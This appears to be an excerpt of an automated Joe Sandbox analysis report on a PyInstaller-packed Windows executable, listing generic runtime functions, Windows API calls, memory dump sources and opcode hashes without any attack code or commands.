                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: char $int $long $short $unsigned
                                                                                      • API String ID: 2943138195-3894466517
                                                                                      • Opcode ID: 041e2dffe1b489bc893f09ff0a4f423b3d9eca273271e83df22d622629981137
                                                                                      • Instruction ID: 04bfdd16242e79c7f4b8b1ce1031f33c59bc630cc7fda7d3c6345ceef6f1c2f7
                                                                                      • Opcode Fuzzy Hash: 041e2dffe1b489bc893f09ff0a4f423b3d9eca273271e83df22d622629981137
                                                                                      • Instruction Fuzzy Hash: B3315D72E18A5989E7169F6ADC541BC37B0FB09764F848171DA8C06BF8DEBCE914C710
                                                                                      Function 00007FF7F3DD2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7F3DD351A,?,00000000,00007FF7F3DD3F1B), ref: 00007FF7F3DD2AA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                      • API String ID: 2050909247-2900015858
                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                      • Instruction ID: 2338e62373cab731f4bafcc08fc800363c258485d9f93c51be2473388b693a90
                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                      • Instruction Fuzzy Hash: 2921A37261978242E7A0ABA1F8817E6B394FB883C0F800135FE9D6B699DF3CD1458790
                                                                                      Function 00007FF7F3DD8570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                      • String ID:
                                                                                      • API String ID: 995526605-0
                                                                                      • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                      • Instruction ID: 39c2c2dd1efad5beee1ad3935f86356d63acf98b9d2b951d9ca8f070a925fc3f
                                                                                      • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                      • Instruction Fuzzy Hash: E4217531A0C64642EB90ABA5B48023AF3A0EF85BF0F940235EA7D5B7E8DE7CD4458750
                                                                                      Function 00007FF7F3DEB150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2506987500-0
                                                                                      • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                      • Instruction ID: 6397378a33eb6dfd7396cd54dd04011d575d1aab3762eaaa148440c2ef8a86e4
                                                                                      • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                      • Instruction Fuzzy Hash: E3216D24A0E64341F7DC73A19A52239DA525F447B0FC14734DC7E6EBC6DD2CB48043A2
                                                                                      Function 00007FF7F3DF7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                      • String ID: CONOUT$
                                                                                      • API String ID: 3230265001-3130406586
                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                      • Instruction ID: 9b6a9472490d9b769d5be196821b737aa5cb5c82b1e9c9949af106ac281c8a4d
                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                      • Instruction Fuzzy Hash: 53119A21718A4186E790AB52E894329A2A0FF88BE4F800234DD7E9F7D4DF7CD5148790
                                                                                      Function 00007FFE126CADEC Relevance: 9.2, APIs: 6, Instructions: 161COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+$NameName::
                                                                                      • String ID:
                                                                                      • API String ID: 168861036-0
                                                                                      • Opcode ID: 80a690cc5bf4571957900b2ba371d1f0df44bd22a0b18b914ff66e25afa9163e
                                                                                      • Instruction ID: 5342506f55481fb985c21790e7473cd4cece63ce58edb80d2a4b1458a4f9a484
                                                                                      • Opcode Fuzzy Hash: 80a690cc5bf4571957900b2ba371d1f0df44bd22a0b18b914ff66e25afa9163e
                                                                                      • Instruction Fuzzy Hash: 73718C72E08E8A8AE711DF92EC442BC37A1BB54764F908075DA5D176E5DFBCE862C340
                                                                                      Function 00007FF7F3DD8ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8EFD
                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8F5A
                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8FE5
                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD9044
                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD9055
                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD906A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 3462794448-0
                                                                                      • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                      • Instruction ID: 40145a9dcc7ae26b6c931567a13f5dbdef37355701136006c814a1a5faf4dccd
                                                                                      • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                      • Instruction Fuzzy Hash: 3441D961A1968281EBB0BB61B4402BAB394FF84BC4F844135DF6DAB7C9DE3DE511C790
                                                                                      Function 00007FFE126C69F0 Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 3741236498-0
                                                                                      • Opcode ID: 0fa2fcead297943da074142d2fbec92c84cd60449e30d9ad217028345c3eb4d3
                                                                                      • Instruction ID: 2308f2806ea307b3a894a679e0b416b978f09733185a98d81df21b488386760e
                                                                                      • Opcode Fuzzy Hash: 0fa2fcead297943da074142d2fbec92c84cd60449e30d9ad217028345c3eb4d3
                                                                                      • Instruction Fuzzy Hash: 4331A422B19F9695EA15EB579C0456933A0FF48BF0B998571DD2D033E0EE7DE8A2C304
                                                                                      Function 00007FF7F3DD90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetCurrentProcess.KERNEL32 ref: 00007FF7F3DD8590
                                                                                        • Part of subcall function 00007FF7F3DD8570: OpenProcessToken.ADVAPI32 ref: 00007FF7F3DD85A3
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetTokenInformation.ADVAPI32 ref: 00007FF7F3DD85C8
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetLastError.KERNEL32 ref: 00007FF7F3DD85D2
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetTokenInformation.ADVAPI32 ref: 00007FF7F3DD8612
                                                                                        • Part of subcall function 00007FF7F3DD8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7F3DD862E
                                                                                        • Part of subcall function 00007FF7F3DD8570: CloseHandle.KERNEL32 ref: 00007FF7F3DD8646
                                                                                      • LocalFree.KERNEL32(?,00007FF7F3DD3C55), ref: 00007FF7F3DD916C
                                                                                      • LocalFree.KERNEL32(?,00007FF7F3DD3C55), ref: 00007FF7F3DD9175
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                      • API String ID: 6828938-1529539262
                                                                                      • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                      • Instruction ID: 5c559135aa7fa92dd1b9bc85adf760504fe181482b3f7e05a792f7f0c7c96ced
                                                                                      • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                      • Instruction Fuzzy Hash: A6215321A0874281F790BBA0E8552EAB361FF84780FC44135EA6D6B7D9DF3CE84587E0
                                                                                      Function 00007FF7F3DEB2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB2D7
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB30D
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB33A
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB34B
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB35C
                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB377
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2506987500-0
                                                                                      • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                      • Instruction ID: c5d781daee3a063b7547994cd98520d5f517218cb54cb10e4bd36e75af17cfe5
                                                                                      • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                      • Instruction Fuzzy Hash: D8113A20E0D64282F7DC73A19642139D9469F447A0FD54734DC7E6EAD6DE6CB48143A2
                                                                                      Function 00007FFE126C3F60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort$CallEncodePointerTranslator
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2889003569-2084237596
                                                                                      • Opcode ID: 93ffbb8a8c38b724cb13d32310db34e78531563cac4ba1370c621256939a6833
                                                                                      • Instruction ID: 8c475816d367277fb2ad50eb1efd160659205b7322cd7be5c6cdc624166a1136
                                                                                      • Opcode Fuzzy Hash: 93ffbb8a8c38b724cb13d32310db34e78531563cac4ba1370c621256939a6833
                                                                                      • Instruction Fuzzy Hash: 8991D473A08B858AE710DF66E8402AD77B0F7447A8F50413AEE8D57BA9DF78D165C700
                                                                                      Function 00007FFE126CC540 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                      • API String ID: 2943138195-757766384
                                                                                      • Opcode ID: 01adbf8b940f63687fb8b05ad2c3f4aee868cfabe9c87335b9cb2bee01f92b8d
                                                                                      • Instruction ID: a951e2f688b5e4b76bf79997fbe95f3c491ae3432392ed6c205f58d3f48253c9
                                                                                      • Opcode Fuzzy Hash: 01adbf8b940f63687fb8b05ad2c3f4aee868cfabe9c87335b9cb2bee01f92b8d
                                                                                      • Instruction Fuzzy Hash: FA716B72A08E4A89EB14AF66DD541B827A4FB057A0FD445B5CA8D43AF8DFBCE170C340
                                                                                      Function 00007FFE126C3CF0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort$CallEncodePointerTranslator
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2889003569-2084237596
                                                                                      • Opcode ID: 8e034f92e989b9960bc08160daca0ef1833c14a7b13808a87468da7d70181806
                                                                                      • Instruction ID: be64d6add51ff24b885dfbf26abdae6646a8227db3f0a5eb9915263d591f1929
                                                                                      • Opcode Fuzzy Hash: 8e034f92e989b9960bc08160daca0ef1833c14a7b13808a87468da7d70181806
                                                                                      • Instruction Fuzzy Hash: 8261C872908FC586D7609F16E8403A9B7A0FB847A4F444235EB9C07BA5CF7CD1A4CB00
                                                                                      Function 00007FFE126C5C50 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 135COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHeader
                                                                                      • String ID: MOC$RCC$csm$csm
                                                                                      • API String ID: 104395404-1441736206
                                                                                      • Opcode ID: 5815091cf7d4bf77be2b6452b49c3696097c0f3c73df3e225fc204c9d15c1510
                                                                                      • Instruction ID: 6413bf30bde2799fdabe9a3ab0f1c836723572d8e48b9755fe406d8e33e2a9bc
                                                                                      • Opcode Fuzzy Hash: 5815091cf7d4bf77be2b6452b49c3696097c0f3c73df3e225fc204c9d15c1510
                                                                                      • Instruction Fuzzy Hash: 5951B172A09F4687EA60AB26AC4013D26A0FF487A4F840171DE4D677E1DFBCF8718645
                                                                                      Function 00007FF7F3DD2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F3DD1B6A), ref: 00007FF7F3DD295E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                      • API String ID: 2050909247-2962405886
                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                      • Instruction ID: d67a4eee5423aefc265e6fa62ea03babe85d61feead22d1ec5c153e67b4c86d0
                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                      • Instruction Fuzzy Hash: CC312862B1968142E790B7A5B8406E7B295BF887D4F800131FEADAB789DF3CD1468390
                                                                                      Function 00007FF7F3DD2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7F3DD918F,?,00007FF7F3DD3C55), ref: 00007FF7F3DD2BA0
                                                                                      • MessageBoxW.USER32 ref: 00007FF7F3DD2C2A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
